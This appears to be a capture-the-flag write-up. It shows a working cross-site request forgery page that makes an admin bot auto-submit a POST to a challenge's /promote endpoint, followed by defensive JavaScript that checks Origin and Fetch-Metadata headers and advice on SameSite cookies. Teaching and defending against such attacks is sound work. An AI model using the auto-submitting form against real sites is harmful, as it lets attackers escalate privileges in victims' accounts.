@cwgreene
Created June 15, 2020 01:49

Customer Service

We get presented with a login / register screen. Once registered and logged in, we discover that we've been given a login token cookie e4955d3a-2920-485c-ab85-232a96351872.

If we paste that into the form, we get "Not Admin..."

Following the Report Issues link, we are given the opportunity to get the admin bot to visit an arbitrary URL.

If we just give the bot the promote URL, it won't work: promote is a POST request, and the body argument would not be submitted with it. So instead, we set up a website with the following HTML:

<!DOCTYPE html>
<html>
<body onload="setTimeout(function() {document.doom.submit()})">
    <form action="http://customer.w-va.cf/promote" name="doom" method="POST">
        <input name="user_token" value="e4955d3a-2920-485c-ab85-232a96351872">
    </form>
</body>
</html>

This will automatically submit the form with the desired value as soon as the page loads. Technically, since the request has no custom headers, we could also have done this as a fetch request.

So we submit the URL of the above website to the bot, and we get promoted. Refreshing the page results in us seeing the flag.
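
The forged request succeeds because the promote endpoint accepts the POST no matter which site caused the admin bot's browser to send it. The following is an added example, not part of the original writeup or the challenge's code, of a server-side origin check that would reject it; `ALLOWED_ORIGIN`, `checkRequestOrigin`, `originOf` and the sample requests are assumptions constructed for illustration.

```javascript
// Added example; ALLOWED_ORIGIN and the sample requests are constructed.
const ALLOWED_ORIGIN = "http://customer.w-va.cf";
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Reduce an Origin or Referer header value to "scheme://host[:port]", or null.
function originOf(value) {
  if (!value || value === "null") return null;
  try {
    return new URL(value).origin;
  } catch {
    return null;
  }
}

// headers: object keyed by lower-cased header name (as Node's http module gives).
function checkRequestOrigin(method, headers) {
  if (!STATE_CHANGING.has(method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  // Fetch Metadata: browsers send this only to secure (HTTPS) origins, so it may be absent.
  const site = headers["sec-fetch-site"];
  if (site && site !== "same-origin" && site !== "none") {
    return { allow: false, reason: `sec-fetch-site=${site}` };
  }
  // Browsers attach Origin to cross-origin form POSTs; use Referer only if
  // Origin is missing altogether.
  const raw = headers["origin"] !== undefined ? headers["origin"] : headers["referer"];
  const source = originOf(raw);
  if (source === null) return { allow: false, reason: "no usable Origin or Referer" };
  if (source !== ALLOWED_ORIGIN) return { allow: false, reason: `foreign origin ${source}` };
  return { allow: true, reason: "same origin" };
}

// Constructed requests: the auto-submitted form, the site's own form, a header-less POST.
const SAMPLES = [
  ["POST", { origin: "http://attacker.example", "content-type": "application/x-www-form-urlencoded" }],
  ["POST", { origin: "http://customer.w-va.cf", referer: "http://customer.w-va.cf/" }],
  ["POST", { "content-type": "application/x-www-form-urlencoded" }],
];
for (const [method, headers] of SAMPLES) {
  const verdict = checkRequestOrigin(method, headers);
  console.log(method, headers.origin ?? "(no Origin)", "->", verdict.allow ? "allow" : "reject", `(${verdict.reason})`);
}
```

Setting `SameSite=Lax` or `SameSite=Strict` on the login token cookie is a complementary control: the browser then omits the cookie from a cross-site form POST.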
